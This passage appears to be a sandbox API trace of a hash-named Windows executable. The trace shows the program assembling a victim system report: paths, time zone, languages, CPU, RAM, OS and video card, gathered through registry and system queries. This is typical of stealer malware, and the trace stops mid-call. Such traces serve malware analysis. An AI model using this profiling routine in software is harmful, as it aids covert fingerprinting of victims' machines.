C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: ", lpString2="English (United States)" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)" [0208.034] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\n" [0208.034] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\n", lpString2="Is Laptop: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: " [0208.034] GetSystemPowerStatus (in: lpSystemPowerStatus=0x19d628 | out: lpSystemPowerStatus=0x19d628) returned 1 [0208.034] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: ", lpString2="No" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No" [0208.034] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\n" [0208.034] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\n", lpString2="Processor: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: " [0208.035] GetProcessHeap () returned 0x5b0000 [0208.035] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5db118 [0208.035] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="HARDWARE\\\\DESCRIPTION\\\\System\\\\CentralProcessor\\\\0", ulOptions=0x0, samDesired=0x20119, phkResult=0x19d630 | out: phkResult=0x19d630*=0x268) returned 0x0 [0208.035] RegQueryValueExA (in: hKey=0x268, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x5db118, lpcbData=0x19d62c*=0xff | out: lpType=0x0, lpData=0x5db118*=0x49, lpcbData=0x19d62c*=0x28) returned 0x0 [0208.035] RegCloseKey (hKey=0x268) returned 0x0 [0208.035] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: ", lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0208.035] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\n" [0208.035] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\n", lpString2="Installed RAM: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: " [0208.035] GetProcessHeap () returned 0x5b0000 [0208.035] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5da2e0 [0208.035] GlobalMemoryStatusEx (in: lpBuffer=0x19d5e4 | out: lpBuffer=0x19d5e4) returned 1 [0208.035] wsprintfA (in: param_1=0x5da2e0, param_2="%d MB" | out: param_1="4096 MB") returned 7 [0208.036] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: ", lpString2="4096 MB" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB" [0208.036] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\n" [0208.036] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\n", lpString2="OS: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: " [0208.036] GetProcessHeap () returned 0x5b0000 [0208.036] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5da628 [0208.036] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x19d630 | out: phkResult=0x19d630*=0x268) returned 0x0 [0208.036] RegQueryValueExA (in: hKey=0x268, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x5da628, lpcbData=0x19d62c*=0xff | out: lpType=0x0, lpData=0x5da628*=0x57, lpcbData=0x19d62c*=0xf) returned 0x0 [0208.044] RegCloseKey (hKey=0x268) returned 0x0 [0208.044] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: ", lpString2="Windows 10 Pro" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro" [0208.044] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro", lpString2=" (" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (" [0208.044] GetCurrentProcess () returned 0xffffffff [0208.044] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19d630 | out: Wow64Process=0x19d630*=1) returned 1 [0208.044] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (", lpString2="x64" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64" [0208.044] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64", lpString2=" Bit)" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)" [0208.044] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\n" [0208.044] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\n", lpString2="Videocard: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: " [0208.044] EnumDisplayDevicesA (in: lpDevice=0x0, iDevNum=0x0, lpDisplayDevice=0x19d48c, dwFlags=0x1 | out: lpDisplayDevice=0x19d48c) returned 1 [0208.045] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: ", lpString2="Microsoft Basic Display Adapter" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter" [0208.045] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: 